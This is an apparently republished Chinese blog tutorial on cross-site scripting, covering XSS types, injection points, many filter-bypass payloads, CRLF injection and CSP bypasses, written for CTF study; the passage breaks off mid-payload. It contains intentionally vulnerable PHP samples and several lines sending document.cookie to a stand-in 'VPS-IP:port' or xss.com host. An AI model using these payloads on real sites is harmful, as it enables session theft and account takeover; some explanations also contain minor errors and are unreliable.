对于XSS跨站脚本攻击的学习

对于XSS跨站脚本攻击的学习
2023-3-30 14:1:0 Author: xz.aliyun.com(查看原文) 阅读量:38 收藏

前言

最近学完XXE之后，对于这种恶意代码注入的漏洞提起来兴趣，想着现在正好趁热打铁，学习一下XSS，之前做题的时候看大师傅的wp一愣一愣的，不明白个所以然，这次系统的学习一下,在本文中将介绍有关XSS的知识点以及原理，也会介绍XSS的绕过姿势(这里参考了别的大师傅的思路，也给出了我自己的理解)，希望给正在学习XSS的你有帮助。

1.概念

跨站脚本攻击（Cross-Site Scripting，XSS）是一种常见的Web安全漏洞，攻击者通过在受害者的浏览器中注入恶意脚本来执行恶意行为。这种攻击通常利用Web应用程序没有对用户输入的数据进行足够的过滤和验证。

2.攻击原理

XSS跨站脚本攻击的原理是利用Web应用程序对用户输入数据的不足过滤和验证，将恶意脚本注入到受害者的浏览器中，使其在浏览器中执行。
攻击者通常会将恶意脚本嵌入到Web页面中的某个位置，比如输入框、评论框、搜索框等等，然后诱使用户访问这个被注入了恶意脚本的页面。当用户访问页面时，恶意脚本就会在用户的浏览器中被执行，从而执行攻击者预先设定好的恶意行为，比如窃取用户的Cookie信息、伪造用户的网站行为等等。

3.XSS的分类

存储型XSS：

持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie

一般是将恶意代码通过交互界面上传到后端，然后从而上传到数据库中，当管理员admin查询数据库的信息时，恶意脚本又从后端到了前端，这也就是存储型XSS的数据流通。

这种XSS攻击方式相比于反射型XSS更加容易进行攻击，它可以把恶意脚本存储在数据库，实现自动化攻击

一般在做CTF题目中的具体思路就是利用GET、POST或者抓包在Referer，Cookie的地方植入我们的恶意脚本

源码示例

<!DOCTYPE html>
<html>
<head>
  <title>存储型XSS示例</title>
</head>
<body>
  <h1>欢迎使用我们的网站！</h1>
  <form>
    <p>请输入您的评论：</p>
    <textarea name="comment"></textarea>
    <button type="submit">提交</button>
  </form>
  <?php
    // 处理评论表单的提交
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
      $comment = $_POST['comment'];
      // 将评论存储到数据库中
      $sql = "INSERT INTO comments (content) VALUES ('$comment')";
      mysqli_query($conn, $sql);
    }
  ?>
  <h2>评论区</h2>
  <ul>
    <?php
      // 显示所有评论
      $result = mysqli_query($conn, "SELECT * FROM comments");
      while ($row = mysqli_fetch_assoc($result)) {
        echo "<li>" . $row['content'] . "</li>";
      }
    ?>
  </ul>
</body>
</html>

如果我们在评论区尝试最基础的JavaScript代码，

<script>alert(hack)</script>

会成功弹窗

反射型XSS：

非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。

一般就是题目给一个<input>标签形成的输入框，然后我们在输入框里输入我们的恶意脚本，需要用户进行触发才能进行攻击，在前端输入恶意脚本，后端接受，然后再在前端显示，这也就是反射型XSS的数据流通。

这种XSS攻击方式是最简单的一种XSS攻击方式，它需要用户手动触发才能执行。

在CTF中，反射型XSS算是比较常见的一种XSS攻击方式了，题目会给一个输入框，然后绕过过滤，执行恶意脚本

源码示例

<!DOCTYPE html>
<html>
<head>
  <title>反射型XSS示例</title>
</head>
<body>
  <h1>欢迎使用我们的网站！</h1>
  <p>请输入您的姓名：</p>
  <form>
    <input type="text" name="name">
    <button type="submit">提交</button>
  </form>
  <p>您好，<?php echo $_GET['name']; ?>！</p> 
</body>
</html>

在接受name传参的值时，html页面是没有任何保护措施的，用户如果在这里执行了JavaScript代码，也会直接输出，从而进行XSS攻击

DOM型XSS:

不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS。

这种XSS攻击是不经过后端的，它也算是一种反射型XSS，但是它的数据流通过程比较简单，就是在前端url添加我们的恶意脚本，然后直接在页面输出了

源码示例

<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>DOM-based XSS</title>
</head>
<body>
  <h1>欢迎来到我的blog!</h1>
  <script>
    var query = window.location.search.substring(1);
    var name = query.split("=")[1];
    document.write("<p>Hello, " + name + "!</p>");
  </script>
</body>
</html>

<script>alert(hack)</script>

可以发现我们通过name传参的JavaScript代码已经嵌入到HTML页面中了，也就完成了DOM型XSS攻击

题外话

介绍一下我最近发现的一个比较罕见的XSS攻击方式

JSONP XSS：

这个其实也是反射型XSS的一种攻击方式。

这是一种比较罕见的一种XSS的攻击方式，它利用JSONP协议实现，一般浏览器都会设置CSP同源策略限制，不允许直接调用其他域名的API，这就出现了JSONP协议，JSONP协议通过利用浏览器对<script>标签的允许跨域加载特性，允许从一个域名中获取到另一个域名的数据。所以说我们作为攻击者可以在JSONP请求中注入恶意代码实现XSS攻击。

示例

如果我们有一个API端口为"http://Evi1s7.com/api",它返回一个JSONP响应，其中包含一个名为`callback`的函数，该函数将数据作为参数传递。

callback({ "name": "John", "age": 30 });

攻击者可以构造一个恶意URL，以便在受害者浏览器中执行恶意脚本：

https://Evi1s7.com/api?callback=attackerFunction

这会导致我们之前的API端口返回的JSON发生了修改

attacjerFunction({ "name": "John", "age": 30 });

攻击者可以在页面中定义attackerFunction，然后注入恶意脚本：

<script>
function attackerFunction(data) {
  // 恶意代码
  document.cookie = "sessionID=" + data.name;
}
</script>

利用上述恶意脚本，我们可以获得John的sessionID值，窃取Cookie从而实现无密码登录，实现XSS攻击

4.XSS的攻击对象

其实通俗一点来说，就是我们的XSS最终插入到哪里

1.插入到HTML注释内容中

源码示例

<!-- Evi1s7 -->
<!-- 
<script>
  alert('XSS攻击成功！');
</script>
-->

我们可以利用闭合的方式从而插入HTML注释内容之中

2.插入到HTML标签的属性值中

源码示例

<script>alert('Evi1s7')</script><img src="image.png" onerror="<script>alert('Evi1s7')</script>">

在这一段示例的代码中，可以看见我们将<script>恶意代码插入到了<img>标签的oneerror属性中，从而欺骗浏览器执行恶意代码 当image图片无法显示时，会调用onerror属性，从而执行恶意脚本 <h3>3.插入到HTML标签的属性名中</h3> 源码示例 <div class="highlight"><pre><input type="text" onclick="alert('Evi1s7')" name="><script>alert('XSS攻击成功！')</script>"> </pre></div> 在这一段示例的代码，将恶意代码插入到了<input>标签中的name属性值中,我们可以利用闭合的方式将恶意代码插入到<input>标签中，实现XSS攻击 <h3>4.插入到HTML标签名中</h3> 源码示例 <div class="highlight"><pre><<script>alert('XSS攻击成功！')</script>img src="Evi1s7.png"> </pre></div> 在这一段代码中，我们将恶意代码插入到<img>标签中，由于标签名被拆分成两部分，浏览器会将第一个尖括号视为标签名的起始符号，而第二个尖括号则是 <code><script></code> 标签的起始符号，导致浏览器误以为有两个标签被嵌套在一起，从而实现我们的XSS攻击 <h3>5.最简单的插入到script,img,svg标签中</h3> 源码示例 <pre><code><script>alert(Evi1s7)</script></code></pre> <h3>6.插入到CSS中</h3> 源码示例 <div class="highlight"><pre><div style="background-image:url('javascript:alert(`Evi1s7`)');"> </pre></div> 我们在background-image样式属性中插入了一段JavaScript url，当用户打开这一个页面时，会执行弹窗，浏览器会执行我们插入的java伪协议代码，从而执行恶意代码。 <h3>7.插入到HTTP响应中</h3> 这也就牵扯到CRLF漏洞了，目前我还没有接触过利用CRLF漏洞进行XSS，我就先说一下我的理解吧 在 HTTP 协议中，CRLF 被用来分隔 HTTP 请求和响应中的各个部分。 CRLF 是回车符（carriage return，CR）和换行符（line feed，LF）的缩写，它们通常被一起使用来表示一行的结束。CRLF 漏洞（也称为 HTTP 报头注入漏洞）是一种 Web 应用程序安全漏洞，攻击者可以利用这个漏洞向 HTTP 响应中注入任意的 HTTP 头或者响应体，一般攻击者可以通过在输入中注入 CRLF 字符来改变 HTTP 响应的内容，从而实现恶意操作。 比如有一个搜索关键词的网站利用GET的形式传参 <pre><code>exp:?key=aaa</code></pre> 如果该网站存在CRLF漏洞，那么我们就可以利用回车符/换行符进行绕过过滤 <pre><code>?key=%0d%0a%0d%0a<img src=1 onerror=alert(1)></code></pre> 我们抓一下包看一下返回包 <pre><code>HTTP/1.1 200 OK Date:xxxxxxxxxx Content-type:text/html Contet-Length:xxx Connection:close Location: <img src=1 onerror=alert(/xss/)></code></pre> 可以发现我们利用CRLF漏洞将http包分为了header和body，利用回车符/换行符成功执行了body中的代码，实现XSS 如果遇到XSS过滤的情况我们还可以在httpheader中注入X-XSS-Protection:0，可绕过浏览器的过滤规则实现XSS弹窗显示。 <h2>5.XSS的绕过</h2> 在做XSS-labs靶场以及平日做题的时候，碰到一些挺有意思的绕过方式，也学习到了其他师傅的绕过姿势，正好在这里总结一下。 <h3>1.关键词绕过</h3> <h4>1.大小写绕过</h4> 源码示例 <div class="highlight"><pre><!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>XSS漏洞示例</title> </head> <body> <h1>搜索结果</h1> <?php $q = isset($_GET['q']) ? $_GET['q'] : ''; $q = strtolower($q); ?> <p>你搜索的关键词是：<?php echo $q; ?></p> <script> var searchQuery = '<?php echo $q; ?>'; document.write("搜索结果为：" + searchQuery + ""); </script> </body> </html> </pre></div> 上面的代码运用了php中的一个strtolower()函数，将字符串转为小写，但是我们可以利用大小写绕过 <pre><code>xxxxx?q=<sCriPt>alert(1)<sCriPt></code></pre> 发现成功弹窗 <h4>2.拼接绕过</h4> 0x01. eval <div class="highlight"><pre><img src="x" onerror="eval('al'+'ert(Evi1s7)')"> </pre></div> 0x02. top <div class="highlight"><pre><img src="x" onerror="top['al'+'ert'](Evi1s7)"> </pre></div> 0x03. window <pre><code><img src="x" onerror="window['al'+'ert'](1)"></code></pre> 0x04. self <pre><code><img src="x" onerror="self[`al`+`ert`](1)"></code></pre> 0x05. parent <pre><code><img src="x" onerror="parent[`al`+`ert`](1)"></code></pre> 0x06. frames <pre><code><img src="x" onerror="frames[`al`+`ert`](1)"></code></pre> <h4>3.函数替换</h4> <div class="highlight"><pre><img src="x" onerror="eval(alert(1))"> <img src="x" onerror="open(alert(1))"> <img src="x" onerror="document.write(alert(1))"> <img src="x" onerror="setTimeout(alert(1))"> <img src="x" onerror="setInterval(alert(1))"> <img src="x" onerror="Set.constructor(alert(1))"> <img src="x" onerror="Map.constructor(alert(1))"> <img src="x" onerror="Array.constructor(alert(1))"> <img src="x" onerror="WeakSet.constructor(alert(1))"> <img src="x" onerror="constructor.constructor(alert(1))"> <img src="x" onerror="[1].map(alert(1))"> <img src="x" onerror="[1].find(alert(1))"> <img src="x" onerror="[1].every(alert(1))"> <img src="x" onerror="[1].filter(alert(1))"> <img src="x" onerror="[1].forEach(alert(1))"> <img src="x" onerror="[1].findIndex(alert(1))"> </pre></div> 以上只是利用<img>标签进行举例，也可以在别的标签中使用 比如<script> <div class="highlight"><pre><script>Array.constructor('alert(1)')()</script> </pre></div> 比如<iframe> <div class="highlight"><pre><iframe src="nonexistent.html" onerror="[1].findIndex(alert(1))"></iframe> </pre></div> 所以说我们知道这些函数替换就可以 <h4>4.嵌套绕过</h4> 这就要牵扯到上面提到的XSS的攻击对象了 这个就是利用原理进行绕过的 <pre><code><sc<script>ript>alert('Evi1s7')</sc</script>ript></code></pre> <h4>5.赋值绕过</h4> 提供几个payload <pre><code><img src onerror=_=alert,_(1)> <img src x=al y=ert onerror=top[x+y](1)> <img src x=al y=ert onerror=window[x+y](1)> #在网页没有嵌套框架时才有效。 <img src onerror=top[a='al',b='ev',b+a]('alert(1)')> <img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)></code></pre> <h3>2.编码绕过</h3> <h4>1.html实体编码转义</h4> 当我们的可控点为单个标签属性时，可以使用 html 实体编码。 <pre><code><iframe src="可控点">test<iframe> <script>可控点</script></code></pre> payload: <pre><code><a href=javascript:alert(1)>aaa</a></code></pre> 十进制绕过 <pre><code><a href=javascript:alert(1)>aaa</a></code></pre> 十六进制绕过(如果题目过滤了分号，这里其实也可以把分号删去) <pre><code><a href=javascript:alert(1)>aaa</a></code></pre> 填充0 <pre><code><a href=&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a&#x0061&#x006c&#x0065&#x0072&#x0074&#x0028&#x0031&#x0029>aaa</a></code></pre> <h4>2.url编码绕过</h4> 需要注入点存在href属性或者src属性，才可以利用url编码转义 （注意在url解析过程中，不能对协议类型进行任何的编码操作） <pre><code><a href=javascript:alert(1)>Evi1s7</a> # <a href=javascript:%61%6c%65%72%74%28%31%29>Evi1s7</a></code></pre> <pre><code><iframe src=javascript:%61%6c%65%72%74%28%31%29>Evi1s7</iframe></code></pre> <h5>这里顺便介绍一下href属性和src属性配合JavaScript中的标签的意思：</h5> <h6>1.src属性</h6> 总的来说，<code>src</code>属性通常用于指定外部资源的URL，让浏览器从指定的URL中获取资源并加载它们。 0x01:<script>标签 <code>src</code>属性用于指定引入外部JavaScript文件的URL <div class="highlight"><pre><script src="path/to/your/javascript/file.js"></script> </pre></div> 0x02:.<img>标签 <code>src</code>属性用于指定要显示的图像的URL <div class="highlight"><pre><img src="path/to/your/image.jpg" alt="Your Image"> </pre></div> 0x03:<iframe>标签 <code>src</code>属性用于指定要嵌入的另一个文档的URL。 <div class="highlight"><pre><iframe src="path/to/your/page.html"></iframe> </pre></div> 0x04:<audio>和<video>标签 <code>src</code>属性用于指定要播放的音频或视频的URL <div class="highlight"><pre><audio controls> <source src="path/to/your/audio.mp3" type="audio/mp3"> </audio> </pre></div> <div class="highlight"><pre><video controls> <source src="path/to/your/video.mp4" type="video/mp4"> </video> </pre></div> <h6>2.href属性</h6> 总的来说，<code>href</code>属性通常用于指定链接目标的URL或外部资源的URL，以及用于指定基准URL或图像地图中区域的URL。 0x01:<a>标签 <code>href</code>属性用于指定链接目标的URL。 <div class="highlight"><pre><a href="path/to/your/page.html">Link Text</a> </pre></div> 0x02:<link>标签 <code>href</code>属性用于指定外部样式表的URL。 <div class="highlight"><pre><link rel="stylesheet" type="text/css" href="path/to/your/stylesheet.css"> </pre></div> 0x03:<base>标签 <code>href</code>属性用于指定基准URL，所有相对URL都将以该URL为基础。 <div class="highlight"><pre><base href="https://www.example.com/"> <a href="path/to/your/page.html">Link Text</a> </pre></div> 0x04:<area>标签 <code>href</code>属性用于指定图像地图中区域的URL。 <div class="highlight"><pre><img src="path/to/your/image.jpg" alt="Your Image" usemap="#your-map"> <map name="your-map"> <area shape="rect" coords="0,0,100,100" href="path/to/your/page.html"> </map> </pre></div> <h3>3.空格绕过</h3> 在html的标签中的不同位置的空格绕过方式不是一样的 <pre><code><html><imgAAsrcAAonerrorBB=BBalertCC(1)DD</html></code></pre> A位置： /，/123/，%09，%0A，%0C，%0D，%20 B位置：%09，%0A，%0C，%0D，%20 C位置：%0B，/**/ （如果加了双引号，则可以填充 %09，%0A，%0C，%0D，%20） D位置：%09，%0A，%0C，%0D，%20，//，> <h3>4.()绕过</h3> 1.利用反引号 <pre><code><script>alert`1`</script></code></pre> 2.throw绕过 <pre><code><script>alert;throw 1</script></code></pre> <pre><code><svg/onload="window.onerror=eval;throw'=alert\x281\x29';"></code></pre> <h3>5.单引号过滤</h3> 1.可以利用斜杠替换 <pre><code><script>alert(/Evi1s7/)</script></code></pre> 2.利用反引号替换 <pre><code><script>alert(`Evi1s7`)</script></code></pre> <h3>6.alert过滤绕过</h3> 1.利用其他JavaScript的函数替换 prompt() <pre><code><script>prompt('Evi1s7')</script></code></pre> confirm() <pre><code><script>confirm('Evi1s7')</script></code></pre> console.log() <pre><code><script>console.log('Evi1s7')</script></code></pre> document.write() <pre><code><script>document.write('Evi1s7')</script></code></pre> 2.利用编码绕过 <pre><code><img src=x onerror="Function`a${atob`YWxlcnQoMSk=`}```"> #alert(1)</code></pre> <pre><code><a href=javascript:%61%6c%65%72%74%28%31%29>aaa</a> #alert(1)</code></pre> <h3>7.长度限制</h3> 可以利用拆分法 <pre><code><script>a='document.write("'</script> <script>a=a+'<a href=ht'</script> <script>a=a+'tp://VPS-IP:po'</script> <script>a=a+'rt>Evi1s7</a>")'</script> <script>eval(a)</script></code></pre> 利用eval()函数将字符串解析为可执行的代码，从而进行拼接 <pre><code>document.write("<a href=http://VPS-IP:port>Evi1s7</a>")</code></pre> <h3>8.分号绕过</h3> 当只过滤了分号时，可以利用花括号进行语句隔离 <pre><code><script>{onerror=alert}throw 1</script></code></pre> <h3>9.绕过CSP</h3> <h4>CSP概念</h4> <pre><code>CSP指的是Content Security Policy，即内容安全策略。它是一种安全机制，用于保护网站免受跨站脚本攻击（XSS攻击）、数据盗取等Web攻击的影响。 CSP指令可以在HTTP响应头中设置，也可以在HTML文档中使用meta标签设置。通过CSP，网站管理员可以告诉浏览器哪些资源可以加载到页面中，例如可以信任哪些来源的JavaScript、CSS、图片等资源。这样，浏览器就只会加载来自这些受信任来源的资源，从而减少了被恶意脚本攻击的风险。</code></pre> <h4>CSP的分类</h4> 1.Content-Security-Policy:当我们配置好并且启用之后，不符合我们设置的CSP的外部资源会被直接拦截 2.Content-Security-Policy-Report-Only：这个配置好之后只能记录违反限制的行为，并不能进行拦截(这里也是一个漏洞)，但是当我们和report-uri选项配合时可以进行拦截违法行为。 <h4>CSP的结构</h4> CSP由一组指令组成，每个指令用于指定允许加载的资源类型和来源，一个CSP头由多组CSP策略组成，中间由分号分隔。 <ol> <li>指令关键字：指令关键字用于标识指令类型，例如<code>default-src</code>、<code>script-src</code>、<code>style-src</code>等。</li> <li>指令值：指令值用于指定允许加载资源的来源，可以是一个或多个来源，多个来源之间用空格分隔。来源可以是URL、域名、IP地址或通配符等。</li> <li>指令选项：指令选项用于指定一些特殊行为，例如<code>'self'</code>选项用于指定资源只能从同一域名加载，<code>'unsafe-inline'</code>选项用于允许内联脚本等。</li> <li>指令策略：指令策略用于指定如何处理不符合CSP策略的请求，可以选择<code>'allow'</code>、<code>'block'</code>、<code>'report'</code>等选项，每一组策略包含一个策略指令和一个内容源列表。</li> </ol> 示例CSP策略 <div class="highlight"><pre>Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' example.com; img-src * data:; report-uri /csp-report </pre></div> <ol> <li>Content-Security-Policy是CSP的header字段</li> <li><code>default-src</code>指令用于限制默认允许加载的资源类型和来源，这里指定只允许从同一域名加载资源。</li> <li><code>script-src</code>指令用于限制JavaScript脚本的来源，这里指定允许从同一域名加载和允许内联脚本，并允许从<code>example.com</code>域名加载。</li> <li><code>img-src</code>指令用于限制图片的来源，这里指定允许从任何来源加载图片和data URI。</li> <li>策略还指定了违规报告的URL，任何不符合CSP策略的请求将被报告到<code>/csp-report</code>。</li> </ol> <h5>CSP中常见的策略指令</h5> 这些指令可以与特定的源（例如域名、协议、端口）一起使用，也可以使用通配符（*）来表示所有来源。 <ol> <li><code>default-src</code>: 指定默认允许加载的资源类型和来源。</li> <li><code>script-src</code>: 限制JavaScript脚本的来源。</li> <li><code>style-src</code>: 限制CSS样式表的来源。</li> <li><code>img-src</code>: 限制图片的来源。</li> <li><code>connect-src</code>: 限制XMLHttpRequest和WebSocket的来源。</li> <li><code>font-src</code>: 限制字体的来源。</li> <li><code>object-src</code>: 限制object、embed、applet等插件的来源。</li> <li><code>media-src</code>: 限制音频、视频等媒体资源的来源。</li> <li><code>frame-src</code>: 限制iframe的来源。</li> <li><code>child-src</code>: 限制子窗口的来源，包括iframe、web worker、embed等。</li> <li><code>form-action</code>: 限制表单提交的目标地址。</li> <li><code>sandbox</code>: 限制iframe中的脚本和插件的执行权限。</li> <li><code>base-uri</code>: 限制base标签的目标地址。</li> <li><code>report-uri</code>: 指定违规报告的URL。</li> </ol> <h5>CSP策略指令中常见的关键词</h5> CSP策略指令包含一些关键词，这些关键词用于指定资源的类型和来源。 <ol> <li><code>self</code>: 表示当前网站的源，也就是只允许从同一域名加载资源。</li> <li><code>none</code>: 表示不允许加载任何资源。</li> <li><code>unsafe-inline</code>: 表示允许内联脚本、样式表等，但存在安全风险。</li> <li><code>unsafe-eval</code>: 表示允许使用<code>eval()</code>函数执行代码，但存在安全风险。</li> <li><code>strict-dynamic</code>: 表示允许通过<code>nonce</code>或<code>hash</code>机制执行动态脚本，但不允许其他方式的动态脚本。</li> <li><code>nonce-xxxx</code>: 表示允许执行指定的<code>nonce</code>值所对应的脚本，用于限制内联脚本的来源。</li> <li><code>hash-xxxx</code>: 表示允许执行指定的哈希值所对应的脚本，用于限制外部脚本的来源。</li> <li><code>data:</code>: 表示允许加载data URI格式的资源。</li> <li><code>blob:</code>: 表示允许加载blob URL格式的资源。</li> <li><code>mediastream:</code>: 表示允许加载mediastream格式的资源。</li> </ol> <h5>CSP策略指令中的存在安全风险数据类型</h5> 1.<code>data</code>:用于指定可以从<code>data URI</code>格式加载的资源。<code>data URI</code>可以直接将资源的内容编码为字符串嵌入到URL中，而不需要从外部加载资源，因此会有一定的安全风险 示例CSP策略 <div class="highlight"><pre>Content-Security-Policy: default-src 'self'; img-src 'self' data:; </pre></div> 在这个CSP策略中，限制默认加载的资源只能来自当前网站的源，图片的来源可以是来自当前网站的源，也可以是利用<code>data uri</code>中加载，作为攻击者，可以利用<code>data uri</code>构造恶意脚本直接嵌入URL中，从而进行XSS攻击 2.<code>mediastream</code>:用于指定可以从哪些媒体流（例如摄像头或麦克风）加载资源。配合<code>media-src</code>策略指令使用，允许 mediastream: URI 作为内容来源。 示例CSP策略 <div class="highlight"><pre>Content-Security-Policy: media-src mediastream: </pre></div> 这个CSP策略只允许从通过<code>getUserMedia()</code>方法获取的媒体流加载媒体资源，其他来源将被禁止。 3.<code>blob</code>:允许在HTML页面中使用Blob URL，这是一种允许在浏览器中生成URL的API。当CSP策略允许任何来源使用blob数据类型时，会产生安全风险。 示例CSP策略 <div class="highlight"><pre>Content-Security-Policy: default-src 'self'; img-src blob: </pre></div> 给出的示例CSP策略允许任何来源都可以使用blob数据类型来加载图像，这就给了攻击者注入恶意脚本的注入点。 4.<code>unsafe-inline</code>:允许在HTML页面中直接嵌入JavaScript代码。这是一种方便的方法，可以将脚本与页面混合在一起，但是也容易受到XSS攻击的威胁。 示例CSP策略 <div class="highlight"><pre>Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' </pre></div> 这个CSP策略只允许从当前网站加载默认资源，允许使用内联的JavaScript脚本，也就是说允许unsafe-inline，所以说攻击者可以直接利用漏洞执行XSS攻击 5.<code>unsafe-eval</code>:允许在HTML页面中使用eval函数来执行JavaScript代码。 示例CSP策略 <div class="highlight"><pre>Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' </pre></div> 这个CSP策略允许在HTML页面中使用eval函数来执行JavaScript代码，即允许使用'unsafe-eval'。这可能导致数据注入攻击，因为攻击者可以通过注入特殊的参数来控制eval函数的执行结果，从而达到执行恶意代码的目的。 <h4>绕过姿势</h4> <h5>1.利用iframe标签绕过CSP</h5> 示例代码 <div class="highlight"><pre> <?php if (!isset($_COOKIE['Evi1s7'])) { setcookie('Ev1ls7',md5(rand(0,1000))); } header("Content-Security-Policy: default-src 'self';"); ?> <!DOCTYPE html> <html> <head> <title>CSP</title> </head> <body> CSP <?php if (isset($_GET['Evi1s7'])) { echo "Your GET content:"[email protected]$_GET['Evi1s7']; } ?> </body> </html>  <!DOCTYPE html> <html> <head> <title>CSP</title> </head> <body> CSP <?php if (isset($_GET['Evi1s7'])) { echo "Your GET content:"[email protected]$_GET['Evi1s7']; } ?> </body> </html> </pre></div> 这一段代码定义了2个php页面，在1.php中设置了CSP， CSP策略 <div class="highlight"><pre>Content-Security-Policy: default-src 'self'; </pre></div> 但是在2.php中缺没有设置CSP，我们可以利用<iframe>的特性通过JavaScript，来进行操作1.php的DOM <pre><code><script> var iframe = document.createElement('iframe'); iframe.src="./1.php"; document.body.appendChild(iframe); setTimeout(()=>location.href='http://VPS-IP:port/'+escape(document.cookie),1000); </script></code></pre> 这里分析一下payload， 我们可以创建一个<iframe>标签将其嵌入到DOM文档的body元素中，然后将<iframe>标签的src属性设置为'./1.php',从而使浏览器加载并渲染1.php页面的内容，我们的<iframe>标签也会嵌入到页面之中，之后利用了setTimeout()函数，等待了1000毫秒之后，可以向我们的VPS发送当前页面的cookie值，我们只需要在我们的VPS上监听设定的端口即可 <h5>2.location绕过</h5> 这其实就是上面所说的unsafe-inline存在安全风险的利用 示例CSP策略 <div class="highlight"><pre>Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' </pre></div> 这里设定了script-src 'unsafe-inline'; 所以我们可以利用location.href/window.location/window.open 绕过 exp: <pre><code>?name=<script>window.location.href='http://VPS-IP:port'+escape(document.cookie);</script></code></pre> <h5>3.link标签绕过</h5> 适用于可以执行JavaScript脚本，但是无法将CSP数据带出 <pre><code> <link rel="dns-prefetch" href="//${cookie}.vps_ip">  <link rel="prefetch" href="//vps_ip?${cookie}"></code></pre> 带出Cookie <pre><code>var link = document.createElement("link"); link.setAttribute("rel", "prefetch"); link.setAttribute("href", "//VPS-IP/?" + document.cookie); document.head.appendChild(link);</code></pre> 分析一下上面这一段代码，我们创建了一个<link>标签，之后利用setAttribute()方法设定了<link>标签的2个属性值，一个是rel属性，rel属性被设置为prefetch，就是让浏览器下载href属性指定的资源，这里还设定了href属性，href属性被设定为设置一个超链接，当被点击是，会以GET的形式请求我们的VPS，且带着用户自己的cookie值作为查询字符串附加在URL的末尾。 <h5>4.低版本的CDN绕过</h5> 现在CDN新版本的框架安全性很好了，但是较早时候的一些框架存在一些安全风险，有CSP绕过的风险，这里就说明一下如何绕过低版本的CDN框架（前提是此CDN服务商在CSP白名单中） orange师傅在之前一篇文章中有类似的案例<a href="https://paper.seebug.org/855/">Hackmd XSS</a> 题目给出的CSP策略 <pre><code><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-eval' https://cdnjs.cloudflare.com;"></code></pre> 这里可以看到通过script-src策略指令从cloudflare.com引用了CDN服务，这里orange师傅采用了低版本的angular js模板注入来绕过CSP <pre><code><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.min.js> </script> <div ng-app> {{constructor.constructor('alert(document.cookie)')()}} </div></code></pre> 可以弹窗显示当前页面的cookie，说明我们的XSS攻击成功 除了上述的AngularJS库，还有一些可以绕过CSP的库 <img src="https://xzfile.aliyuncs.com/media/upload/picture/20230330140100-3f21d9b0-cec0-1.png" alt="image.png"> <img src="https://xzfile.aliyuncs.com/media/upload/picture/20230330140106-42578260-cec0-1.png" alt="image.png"> 以Jquery-mobile库为例，如果题目给出的CSP策略中包含"script-src 'unsafe-eval'"或者"script-src 'strict-dynamic'"，那么下面的payload就可以绕过CSP： <div class="highlight"><pre><div data-role=popup id='<script>alert(hack)</script>'></div> </pre></div> <h5>5.利用meta标签实现url跳转</h5> 当CSP策略中策略指令default-src 'none'的情况下，可以使用meta标签实现跳转 <div class="highlight"><pre><meta http-equiv="refresh" content="3;url=https://example.com"> </pre></div> 分析一下上面这一段代码是如何实现url跳转的，这里将meta标签的http-equiv的属性值设置为了'refresh'，也就是刷新，后面content属性设置了等待时间为3s，之后跳转到example.com。所以我们也可以利用这一种方式带出用户的Cookie值 <div class="highlight"><pre><meta http-equiv="refresh" content="1;url=http://www.xss.com/x.php?c=[cookie]" > </pre></div> <h5>6.CRLF绕过</h5> 我知道如何利用CRLF漏洞进行XSS，但是利用CRLF漏洞进行绕过CSP这种题目我没有见过，学习了一下evoA师傅的思路 当一个页面存在CRLF漏洞时，且我们的可控点在CSP上方，就可以通过注入回车换行，将CSP挤到HTTP返回体中，这样就绕过了CSP <h5>7.站点可控静态资源绕过</h5> 适用于站点存在可控静态资源，且站点在CSP白名单中 这里给一个绕过codimd的(实例)<a href="https://github.com/k1tten/writeups/blob/master/bugbounty_writeup/HackMD_XSS_%26_Bypass_CSP.md">codimd xss</a> <pre><code><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-eval' https://www.google-analytics.com"></code></pre> 案例中codimd的CSP中使用了<code>www.google-analytics.com</code> 而且<code>www.google-analytics.com</code>中可以让我们自定义JavaScript，所以我们可以绕过CSP <pre><code><script src="https://www.google-analytics.com/gtm/js?id=GTM-PJF5W64"></script></code></pre> <h5>8.站点可控JSONP绕过</h5> 适用于站点存在可控的JSONP，且站点在CSP白名单中 大部分站点的jsonp是完全可控的，只不过有些站点会让jsonp不返回html类型防止直接的反射型XSS，但是如果将url插入到script标签中，除非设置x-content-type-options头，否者尽管返回类型不一致，浏览器依旧会当成js进行解析 以之前做过的bypasses-everywhere为例 题目给出的CSP策略 <div class="highlight"><pre>Content-Security-Policy: script-src www.google.com; img-src *; default-src 'none'; style-src 'unsafe-inline' </pre></div> 这里看起来没有问题，但是script-src策略指令指定的google站点存在可控的JSONP 利用下面payload测试一下 <pre><code><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src https://www.google.com"> <script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert"></script></code></pre> <img src="https://xzfile.aliyuncs.com/media/upload/picture/20230330140117-492b44b4-cec0-1.png" alt="image.png"> 发现成功弹窗，之后我们可以利用注释符将其注释掉，从而实现任意js脚本 <div class="highlight"><pre><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert"><!-- </script><script>alert('Evi1s7')</script> </pre></div> <h5>9.Base-uri绕过</h5> 适用于script-src只使用nonce，没有额外设置base-uri，页面引用存在相对路径的<code><script></code>标签 当服务器CSP script-src采用了nonce时，如果只设置了default-src没有额外设置base-uri，就可以使用<code><base></code>标签使当前页面上下文为自己的vps，如果页面中的合法script标签采用了相对路径，那么最终加载的js就是针对base标签中指定url的相对路径。 <pre><code>exp: <meta 